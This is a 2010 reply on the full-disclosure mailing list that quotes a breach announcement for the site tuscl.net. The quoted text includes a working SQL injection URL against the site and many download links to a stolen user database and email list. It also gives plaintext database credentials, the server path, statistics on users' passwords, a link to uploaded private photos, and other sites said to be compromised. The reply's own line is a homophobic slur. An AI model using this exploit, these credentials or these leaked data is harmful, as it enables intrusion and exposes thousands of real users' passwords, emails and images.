Date: Wed, 8 Sep 2010 23:46:00 +0100
From: Benji <me@...ji.com>
To: Ben <iluv2cane@...il.com>
Cc: full-disclosure@...ts.grok.org.uk, auto595158@...hmail.com,
	tuscl.founder@...il.com
Subject: Re: Tuscl.net SQL injection with 30k Plain Text
 Passwords & 80k Email list

This is gay.

>>> http://bit.ly/bkVnPY
>>> http://is.gd/eTqna
>>> http://jump.fm/FOJRO
>>> http://www.mediafire.com/?l6i1vd25il61a6b
>>> http://www.megafileupload.com/en/file/265174/users-sql-zip.html
>>> http://www.4shared.com/file/w0qqRyDf/userssql.html
>>> http://rapidshare.com/files/416858410/users.sql.zip
>>> http://rapidshare.com/files/416860069/users.sql.zip
>>> http://www.speedyshare.com/files/24097837/users.sql.zip
>>> http://uploading.com/files/e1741mm9/users.sql.zip/
>>> http://bit.ly/cFvd8B
>>> http://is.gd/eTsn5
>>>

>>> http://www.tuscl.net/c.php?CID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
>>>
>>> Common Passwords and the number of accounts that shared them
>>>
>>> password - 269
>>> 123456 - 173
>>> tuscl - 84
>>> stripper - 67
>>> qwerty - 62
>>> 12345 - 49
>>> 12345678 - 47

>>> http://rapidshare.com/files/416871314/emails.zip
>>> http://www.mediafire.com/?67rzfbvmyr1c492
>>> http://www.speedyshare.com/files/24098846/emails.zip
>>> http://www.megafileupload.com/en/file/265210/emails-zip.html
>>>
>>> The path to the working directory is:
>>> /home/httpd/vhosts/tuscl.net/httpdocs/
>>>
>>> The SQL information is
>>> "localhost" - "tuscl" - "szg4wpl9"
>>>
>>> Also if you want to look at all the nudey photos uploaded here is where
>>> they are
>>> http://www.tuscl.net/pictures/
>>>
>>> There are other sites that could have been comprimised as well:
>>> vanjonesthinksimanasshole.com
>>> tuscl.com
>>> onerun.com
>>> ecampguide.com (contains another 1200 plain text passwords)